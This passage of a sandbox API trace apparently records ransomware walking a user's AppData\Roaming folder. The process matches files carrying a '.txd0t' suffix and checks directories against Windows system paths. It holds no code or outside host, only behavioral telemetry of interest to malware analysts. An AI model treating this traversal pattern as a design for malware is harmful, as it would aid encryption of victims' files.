psz2="CUCgHoAM.wav.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t" [0090.029] PathFindExtensionW (pszPath="CUCgHoAM.wav.txd0t") returned=".txd0t" [0090.029] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.029] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1b97a70, ftCreationTime.dwHighDateTime=0x1d5eff4, ftLastAccessTime.dwLowDateTime=0xc073c5d0, ftLastAccessTime.dwHighDateTime=0x1d5e78f, ftLastWriteTime.dwLowDateTime=0x502a827b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15407, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="cv28-Ixq4k3KD.mkv.txd0t", cAlternateFileName="CV28-I~1.TXD")) returned 1 [0090.029] StrCmpW (psz1="cv28-Ixq4k3KD.mkv.txd0t", psz2=".") returned 1 [0090.029] StrCmpW (psz1="cv28-Ixq4k3KD.mkv.txd0t", psz2="..") returned 1 [0090.029] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.029] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.035] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="cv28-Ixq4k3KD.mkv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t" [0090.035] PathFindExtensionW (pszPath="cv28-Ixq4k3KD.mkv.txd0t") returned=".txd0t" [0090.035] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.035] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4194c0, ftCreationTime.dwHighDateTime=0x1d5e2dd, ftLastAccessTime.dwLowDateTime=0xc7d533d0, ftLastAccessTime.dwHighDateTime=0x1d5e515, ftLastWriteTime.dwLowDateTime=0x502ce4a2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12720, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="D3INp6Ei.xlsx.txd0t", cAlternateFileName="D3INP6~1.TXD")) returned 1 [0090.035] StrCmpW (psz1="D3INp6Ei.xlsx.txd0t", psz2=".") returned 1 [0090.035] StrCmpW (psz1="D3INp6Ei.xlsx.txd0t", psz2="..") returned 1 [0090.035] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.035] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.035] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="D3INp6Ei.xlsx.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\D3INp6Ei.xlsx.txd0t" [0090.035] PathFindExtensionW (pszPath="D3INp6Ei.xlsx.txd0t") returned=".txd0t" [0090.035] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.035] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5695d100, ftCreationTime.dwHighDateTime=0x1d5edff, ftLastAccessTime.dwLowDateTime=0xa693630, ftLastAccessTime.dwHighDateTime=0x1d5e915, ftLastWriteTime.dwLowDateTime=0x502f470a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1697c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DRvrEGQ_bV7.png.txd0t", cAlternateFileName="DRVREG~1.TXD")) returned 1 [0090.035] StrCmpW (psz1="DRvrEGQ_bV7.png.txd0t", psz2=".") returned 1 [0090.035] StrCmpW (psz1="DRvrEGQ_bV7.png.txd0t", psz2="..") returned 1 [0090.035] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.035] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DRvrEGQ_bV7.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t" [0090.036] PathFindExtensionW (pszPath="DRvrEGQ_bV7.png.txd0t") returned=".txd0t" [0090.036] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.036] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d3f580, ftCreationTime.dwHighDateTime=0x1d5ee6c, ftLastAccessTime.dwLowDateTime=0xa2661670, ftLastAccessTime.dwHighDateTime=0x1d5e400, ftLastWriteTime.dwLowDateTime=0x502f470a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1448f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DVmE9qFtb1fE2H.bmp.txd0t", cAlternateFileName="DVME9Q~1.TXD")) returned 1 [0090.036] StrCmpW (psz1="DVmE9qFtb1fE2H.bmp.txd0t", psz2=".") returned 1 [0090.036] StrCmpW (psz1="DVmE9qFtb1fE2H.bmp.txd0t", psz2="..") returned 1 [0090.036] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="DVmE9qFtb1fE2H.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t" [0090.036] PathFindExtensionW (pszPath="DVmE9qFtb1fE2H.bmp.txd0t") returned=".txd0t" [0090.036] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.036] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x811d38e0, ftCreationTime.dwHighDateTime=0x1d5e77a, ftLastAccessTime.dwLowDateTime=0x6095b3a0, ftLastAccessTime.dwHighDateTime=0x1d5f093, ftLastWriteTime.dwLowDateTime=0x5031b768, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16161, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ET9_8drX4.bmp.txd0t", cAlternateFileName="ET9_8D~1.TXD")) returned 1 [0090.036] StrCmpW (psz1="ET9_8drX4.bmp.txd0t", psz2=".") returned 1 [0090.036] StrCmpW (psz1="ET9_8drX4.bmp.txd0t", psz2="..") returned 1 [0090.036] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="ET9_8drX4.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\ET9_8drX4.bmp.txd0t" [0090.036] PathFindExtensionW (pszPath="ET9_8drX4.bmp.txd0t") returned=".txd0t" [0090.036] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.036] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8272fdf0, ftCreationTime.dwHighDateTime=0x1d5e492, ftLastAccessTime.dwLowDateTime=0x5b120f00, ftLastAccessTime.dwHighDateTime=0x1d5e7d8, ftLastWriteTime.dwLowDateTime=0x50340bb3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe332, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="f_xuR_I_FeQoISyA_I.avi.txd0t", cAlternateFileName="F_XUR_~1.TXD")) returned 1 [0090.036] StrCmpW (psz1="f_xuR_I_FeQoISyA_I.avi.txd0t", psz2=".") returned 1 [0090.036] StrCmpW (psz1="f_xuR_I_FeQoISyA_I.avi.txd0t", psz2="..") returned 1 [0090.036] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="f_xuR_I_FeQoISyA_I.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t" [0090.036] PathFindExtensionW (pszPath="f_xuR_I_FeQoISyA_I.avi.txd0t") returned=".txd0t" [0090.036] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.036] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec6ceb60, ftCreationTime.dwHighDateTime=0x1d5e516, ftLastAccessTime.dwLowDateTime=0xab8a54e0, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0x50340bb3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17558, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="j9Q4P.avi.txd0t", cAlternateFileName="J9Q4PA~1.TXD")) returned 1 [0090.036] StrCmpW (psz1="j9Q4P.avi.txd0t", psz2=".") returned 1 [0090.036] StrCmpW (psz1="j9Q4P.avi.txd0t", psz2="..") returned 1 [0090.036] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.036] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="j9Q4P.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t" [0090.036] PathFindExtensionW (pszPath="j9Q4P.avi.txd0t") returned=".txd0t" [0090.037] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.037] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76d197f0, ftCreationTime.dwHighDateTime=0x1d5ee41, ftLastAccessTime.dwLowDateTime=0xc11de6a0, ftLastAccessTime.dwHighDateTime=0x1d5eaff, ftLastWriteTime.dwLowDateTime=0x50366d80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3888, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="juYPe6EuKhsFCwN.mp3.txd0t", cAlternateFileName="JUYPE6~1.TXD")) returned 1 [0090.037] StrCmpW (psz1="juYPe6EuKhsFCwN.mp3.txd0t", psz2=".") returned 1 [0090.037] StrCmpW (psz1="juYPe6EuKhsFCwN.mp3.txd0t", psz2="..") returned 1 [0090.037] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="juYPe6EuKhsFCwN.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\juYPe6EuKhsFCwN.mp3.txd0t" [0090.037] PathFindExtensionW (pszPath="juYPe6EuKhsFCwN.mp3.txd0t") returned=".txd0t" [0090.037] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.037] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92c23c0, ftCreationTime.dwHighDateTime=0x1d5eab2, ftLastAccessTime.dwLowDateTime=0xd095ca70, ftLastAccessTime.dwHighDateTime=0x1d5ee11, ftLastWriteTime.dwLowDateTime=0x50366d80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3186, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jZeT4BL.m4a.txd0t", cAlternateFileName="JZET4B~1.TXD")) returned 1 [0090.037] StrCmpW (psz1="jZeT4BL.m4a.txd0t", psz2=".") returned 1 [0090.037] StrCmpW (psz1="jZeT4BL.m4a.txd0t", psz2="..") returned 1 [0090.037] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="jZeT4BL.m4a.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t" [0090.037] PathFindExtensionW (pszPath="jZeT4BL.m4a.txd0t") returned=".txd0t" [0090.037] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.037] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0090.037] StrCmpW (psz1="Macromedia", psz2=".") returned 1 [0090.037] StrCmpW (psz1="Macromedia", psz2="..") returned 1 [0090.037] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Macromedia", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0090.037] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\system32\\") returned 0x0 [0090.037] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.037] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\system\\") returned 0x0 [0090.037] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.037] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Macromedia" [0090.037] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf521500, ftCreationTime.dwHighDateTime=0x1d5e90a, ftLastAccessTime.dwLowDateTime=0x98dc9440, ftLastAccessTime.dwHighDateTime=0x1d5e9db, ftLastWriteTime.dwLowDateTime=0x5038d105, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16060, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mFz6aNQKv94_Rr.mkv.txd0t", cAlternateFileName="MFZ6AN~1.TXD")) returned 1 [0090.037] StrCmpW (psz1="mFz6aNQKv94_Rr.mkv.txd0t", psz2=".") returned 1 [0090.037] StrCmpW (psz1="mFz6aNQKv94_Rr.mkv.txd0t", psz2="..") returned 1 [0090.037] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.037] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mFz6aNQKv94_Rr.mkv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t" [0090.038] PathFindExtensionW (pszPath="mFz6aNQKv94_Rr.mkv.txd0t") returned=".txd0t" [0090.038] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.038] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0090.038] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0090.038] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0090.038] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707d980, ftCreationTime.dwHighDateTime=0x1d5e7a6, ftLastAccessTime.dwLowDateTime=0xdc072a60, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0x5038d105, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14e5a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mlrbk-2k1.jpg.txd0t", cAlternateFileName="MLRBK-~1.TXD")) returned 1 [0090.038] StrCmpW (psz1="mlrbk-2k1.jpg.txd0t", psz2=".") returned 1 [0090.038] StrCmpW (psz1="mlrbk-2k1.jpg.txd0t", psz2="..") returned 1 [0090.038] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mlrbk-2k1.jpg.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg.txd0t" [0090.038] PathFindExtensionW (pszPath="mlrbk-2k1.jpg.txd0t") returned=".txd0t" [0090.038] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.038] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0090.038] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0090.038] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0090.038] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Mozilla", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0090.038] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0090.038] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.038] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0090.038] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.038] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Mozilla" [0090.038] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192c2260, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x19771aa0, ftLastAccessTime.dwHighDateTime=0x1d5e863, ftLastWriteTime.dwLowDateTime=0x504be593, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9384, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="n5hRh8HkX hRtD-9n.png.txd0t", cAlternateFileName="N5HRH8~1.TXD")) returned 1 [0090.038] StrCmpW (psz1="n5hRh8HkX hRtD-9n.png.txd0t", psz2=".") returned 1 [0090.038] StrCmpW (psz1="n5hRh8HkX hRtD-9n.png.txd0t", psz2="..") returned 1 [0090.038] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.038] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="n5hRh8HkX hRtD-9n.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t" [0090.038] PathFindExtensionW (pszPath="n5hRh8HkX hRtD-9n.png.txd0t") returned=".txd0t" [0090.038] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.039] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b5f9690, ftCreationTime.dwHighDateTime=0x1d5e9aa, ftLastAccessTime.dwLowDateTime=0xc0b6aad0, ftLastAccessTime.dwHighDateTime=0x1d5f059, ftLastWriteTime.dwLowDateTime=0x504be593, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xeb73, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PDHYzrp.wav.txd0t", cAlternateFileName="PDHYZR~1.TXD")) returned 1 [0090.039] StrCmpW (psz1="PDHYzrp.wav.txd0t", psz2=".") returned 1 [0090.039] StrCmpW 